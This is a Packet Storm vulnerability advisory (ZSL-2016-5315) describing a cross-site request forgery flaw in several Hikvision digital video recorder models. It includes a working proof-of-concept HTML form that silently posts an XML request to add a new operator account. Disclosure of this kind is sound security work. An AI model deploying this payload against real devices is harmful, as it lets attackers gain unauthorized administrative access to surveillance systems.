Hikvision Digital Video Recorder Cross Site Request Forgery

2016-04-09T00:00:00
ID PACKETSTORM:136629
Type packetstorm
Reporter LiquidWorm
Modified 2016-04-09T00:00:00

Description

                                        
                                            `  
Hikvision Digital Video Recorder Cross-Site Request Forgery  
  
  
Vendor: Hikvision Digital Technology Co., Ltd  
Product web page: http://www.hikvision.com  
Affected version: LV-D2104CS  
DS-7316HFI-ST  
DS-7216HVI-SV/A  
DS-7208HVI-SH  
DS-7204HVI-SH  
  
Summary: Hikvision is the global leader of video surveillance  
products and solutions, manufactures a wide range of top-quality,  
reliable, and professional solutions.  
  
Desc: The application interface allows users to perform certain  
actions via HTTP requests without performing any validity checks  
to verify the requests. This can be exploited to perform certain  
actions with administrative privileges if a logged-in user visits  
a malicious web site.  
  
Tested on: Hikvision-Webs  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5315  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php  
  
Vendor: http://overseas.hikvision.com/europe/list01_435.html  
  
  
13.01.2016  
  
--  
  
  
CSRF Add Operator:  
------------------  
  
<html>  
<body>  
<form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">  
<input type="hidden" name="<?xml version" value="'1.0' encoding='utf-8'?><User><id>3</id><userName>tes2t</userName><password>test2</password><Extensions><bondIp><ipAddress>0.0.0.0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" />  
<input type="submit" value="Submit" />  
</form>  
</body>  
</html>  
`